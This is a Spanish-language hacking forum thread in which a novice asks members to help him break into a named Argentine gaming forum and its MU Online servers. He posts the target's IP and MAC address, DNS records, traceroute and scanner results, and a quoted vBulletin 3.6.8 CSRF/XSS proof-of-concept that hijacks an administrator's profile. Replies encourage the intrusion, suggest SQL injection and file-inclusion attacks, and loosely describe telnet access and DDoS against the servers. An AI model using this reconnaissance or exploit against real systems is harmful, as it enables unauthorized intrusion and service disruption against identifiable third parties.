Gente de la comunidad.. ayuda para un NOVATO ARGENTiNO!

[akom3rla]

Buenos Dias Comunidad InfiernoHAcker

Soy nuevo en la comunidad y quisiera plantear algunas inquietudes...

quiero aclarar q tengo pocos conocimientos en el tema hacking e intrusion,

pero realmente necesitaria encontrar alguna forma de tener acceso a este portal..

bueno paso a explicar mi inconclusa y pequeña investigacion:

El sitio principal es un foro o comunidad de juegos online. Por el momento solo alberga
2 servidores de mu online:
1- servidor de mu online version 1.04 s3e2 low exp x3
2- servidor de mu online version 1.04 s3e2 fast exp x40

me gustaria q alguno de ustedes lo tomara como un reto tambien .. ya q no tengo muchos conocimientos como dije anteriormente y quisiera ver hasta donde pueden llegar ustedes ...y asi tambien aprender un poco...

bueno ahora los datos... ( no c si esta permitido pero los pondre)

Direccion del Portal: ( comunidad/Foro )
Foro.gnxg.net

Direccion Web servidor Mu online: (Low exp)
armus.gnxg.net

Direccion Web servidor Mu online: (Fast exp)
mu.gnxg.net

a partir de estas 3 direcciones pude averiguar algunos datos tales como:

EL portal/Foro foro.gnxg.net se encuentra hosteado en:
You are not allowed to view links. Register or Login = IP: 190.0.162.73 MAC ADD = 00:13:49:3B:03:4E


Hostiado en solunet.com.ar una empresa de hosting/housing de medio pelo en argentina:



en este sitio xpromx.com.ar eh chusmeado algo y eh econtrado lo siguiente:

Utilizando SSS:



Utilizando Angry Ip scanner:



como se denota en las imagenes anteriores un servidor FTP:



tambien eh consultado con un soft llamado ACUNETIX o algo asi y me ah dado esta informacion:


 
luego me interese un poco sobre los dominios y sus DNS correspondientes:

dominio1
xpromx.com.ar

DNS seteados:

DNS Primario:  Nombre:ns1.x-server.com.ar
Dirección IP:190.0.162.73
DNS Secundario:  Nombre:ns2.everydns.net

dominio2
x-server.com.ar

DNS seteados:

DNS Primario:    Nombre:ns1.everydns.net
DNS Secundario:  Nombre:ns2.everydns.net
Dirección IP: -

RESUMEN



------------
ahora enfocandome un poco mas en las posibles vulnerabilidades del foro en si,
a simple vista encontre los siguientes datos:



y eh buscado un exploit para esa version de Vbulletin:

vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower

As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:

Code:
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="You are not allowed to view links. Register or Login[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>

por supuesto no sabria por donde empezar ^^ jajaja..

------------

ahora examinando un poco las direciones webs de los 2 servidores encontre:
utilizando la herramienta Tracert

gnxg.net

mx2916.godns.net   ( 190.228.29.16 )

mx2916.godns.net   traceado hasta -  208.70.191.245
                                                    208.70.188.15


armus.gnxg.net   -
         200.42.50.105
         200.42.42.122
         200.42.42.82
         200.42.53.69
         201.212.0.87

mu.gnxg.net      - 
         200.42.50.105
         200.42.42.126
         200.42.42.114
         200.42.42.78
         200.42.53.70
         201.212.0.86  ( l2-extreme.patan.com.ar )

suponiendo q esas ip finales serian las de los 2 servidores de MU Online.
Hosteados por cierto en:



Scaneando con SSS Mu.gnxg.net

FileZilla FTP Server Multiple Remote Denial Of Service
Vulnerabilities

Bugtraq ID:  12865 
Class:  Failure to Handle Exceptional Conditions 
CVE:  CAN-2005-0850
CAN-2005-0851
 
Remote:  Yes 
Local:  No 
Published:  Mar 22 2005 12:00AM 
Updated:  Mar 22 2005 12:00AM 
Credit:  These vulnerabilities were announced
by the vendor. 

Vulnerable: 
FileZilla FileZilla Server 0.7.1
FileZilla FileZilla Server 0.7
FileZilla FileZilla Server 0.9.5
FileZilla FileZilla Server 0.9.4e
FileZilla FileZilla Server 0.9.4d
FileZilla FileZilla Server 0.9.3
FileZilla FileZilla Server 0.9.2
FileZilla FileZilla Server 0.9.1b
FileZilla FileZilla Server 0.9.0
FileZilla FileZilla Server 0.8.9
FileZilla FileZilla Server 0.8.8
FileZilla FileZilla Server 0.8.7
FileZilla FileZilla Server 0.8.6a
FileZilla FileZilla Server 0.8.5
FileZilla FileZilla Server 0.8.4
FileZilla FileZilla Server 0.8.3
FileZilla FileZilla Server 0.8.2
FileZilla FileZilla Server 0.8.1
 
Not Vulnerable: 
FileZilla FileZilla Server 0.9.6

aqui scaneando con acunetix mu.gnxg.net





SUPONGO Q AQUI ME FALTA EL SCRIPT.. NO TENGO IDEA..



LOS RESULTADOS DEL SCAN..

You are not allowed to view links. Register or Login

desde ya quisiera q me Orienten un poco mas ..
y si es posible q me agreguen al msn..

MUCHAS GRACIAS y ESPERO ALGUNAS RESPUESTAS.

[akom3rla]

ALGUIEN ON ? Fnix.. manifiest.. skywalker.. juan barrera.. pasqo..BenzaKeitor... grey mackannan?

alguien q me de una mano?

[PanzeR]

No hagas doble post, y menos así, si no te respondieron es o por que no saben o por que todavía no vieron el tema. Saludos. Y bienvenido ;)

[Skywalker]

Primero que nada, no hagas doble post ;) Cuando puedas lee las reglas generales. Tambien comentarte que nadie aqui te hara las cosas. Te ayudaremos, y te guiaremos, pero tu debes ser quien las haga ;)
Bueno, los servidores de MU estan en un lugar, y el del foro en otro seguramente. Habria que ver a cual quieres acceder. Deberias pasarte por la seccion bugs & exploits y leer acerca de RFI, LFI, SQL Injection, y todas esas cosas que te ayudaran (Ahora o mas adelante) para buscar vulnerabilidades ;)
Cuando tenga tiempo lo miro mas a fondo a este tema :)

PD: No porque estemos online debemos responder el post. Hay veces que solo conecto para revisar la admin, otros mods solo para actualizar su seccion. Debes ser paciente con las respuestas  ;) Gracias

Saludos

[akom3rla]

bueno pido perdon por el doble post...

veo q tube 38 visitas y 2 respuestas...
me gustaria q alguien mas me diera algun consejo .. para saber por donde empezar..
no pretendo q ustedes hagan las cosas por mi pero si alguien se prende mejor..

gracias skywalker por tu breve explicacion y espero con ansias tu ayuda.
saludos

[whaitie]

bueno pido perdon por el doble post...

veo q tube 38 visitas y 2 respuestas...
me gustaria q alguien mas me diera algun consejo .. para saber por donde empezar..
no pretendo q ustedes hagan las cosas por mi pero si alguien se prende mejor..

gracias skywalker por tu breve explicacion y espero con ansias tu ayuda.
saludos

ahora toy algo ocupadito,pero yo tube servers de MU hasta la v1.04j, y me se todo!

despeus te ayudoa  hackear un MU vale  ;).

creeme que e smuyf acil, y si tiene SQl 2000 tan al hrono xD

un salu2,taremos en contacto

[akom3rla]

bueno pido perdon por el doble post...

veo q tube 38 visitas y 2 respuestas...
me gustaria q alguien mas me diera algun consejo .. para saber por donde empezar..
no pretendo q ustedes hagan las cosas por mi pero si alguien se prende mejor..

gracias skywalker por tu breve explicacion y espero con ansias tu ayuda.
saludos

ahora toy algo ocupadito,pero yo tube servers de MU hasta la v1.04j, y me se todo!

despeus te ayudoa  hackear un MU vale  ;).

creeme que e smuyf acil, y si tiene SQl 2000 tan al hrono xD

un salu2,taremos en contacto

gracias te eh agregado al msn..

[Benzakeitor]

mira ase tiempo atra testeaba mucho sobre el mu y sus bugs y demas

las entradas mas factible a los mu es sabiendo el protocolo de dicha version

ya q desde hay podes aserle desde un ataque ddos , y para hackearlo al mu ya es tema de sacar
la ip alterna y externa

y rompiendo las entradas


por ejemplo la entradas para hackear un Mu de version 97 es desde su vulneribilidad

el puerto 55507

entonce con TELNET podes acceder al host

y bueno podes aser lo q qieras

y el bugs del protocolo es del main.exe , q lo podes sacar del cliente de dicho mu y ejecutarlo

desde comando Perl , sacar el  hexa.txt  y desde hay

pasarlo a Perl y ddosearlo

bueno no es tan dificl , en el foro tene muchas guias de como entrar ah host y como aser

ataque Ddos a servidores , tanto de mu como de web

Bueno , perdon por responder tarde ya que no me pasaba mucho por aca


Saludos , cualquier duda pregunta ;)

[akom3rla]

benza te eh agregado al msn y me has dicho q estaba equivocado q no eras tu ^^

por q ?

[Benzakeitor]

benza te eh agregado al msn y me has dicho q estaba equivocado q no eras tu ^^

por q ?

si es cierto

es q ese dia estaba en mi movil y estaba en la universidad , camuflado ^^

con el movil

bueno pero para la proxima decime q sos user de IH  y te atendere con gusto ;)

[wawi]

hola gente me interesa este post , quiero preguntar si pudieron ver algo acerca del server , ya que he intentado de todo , pero parece que tiene mucha seguridad, basicamente probee de todo con el WPE PRO

espero respuestas  , saludos.

[Benzakeitor]

sabes algo amigo , el otro dia lei algo muy interesante

hay muchas formas de aserlo , pero casi siempre te lo explican en los foros en palabras resumidas y cortas

pero te dejo un manual , es mas un libro algo asi

You are not allowed to view links. Register or Login

q tiene ese manual ??

-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital


pero fijate en lo primero q enseña :)

con eso usa la imaginacion y tu conocimiento aprendido en el manual y lo lograras

te digo por experiencia :)

saludos